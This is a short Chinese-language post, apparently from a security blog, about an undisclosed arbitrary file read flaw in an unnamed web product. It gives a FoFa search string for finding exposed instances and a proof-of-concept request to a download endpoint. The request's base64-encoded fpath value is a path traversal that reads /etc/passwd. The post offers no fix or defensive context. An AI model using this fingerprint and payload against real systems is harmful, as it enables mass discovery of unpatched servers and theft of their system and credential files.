被漏洞扫描翻日志找到的任意文件读取漏洞(未公开)

lovesaber157 / 2024-09-27 / 原文

FoFa

body="k-login-layer"

POC

只在日志里面翻到Linux版本的利用方式
/pub/tools/dowload_soft.jsp?fpath=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==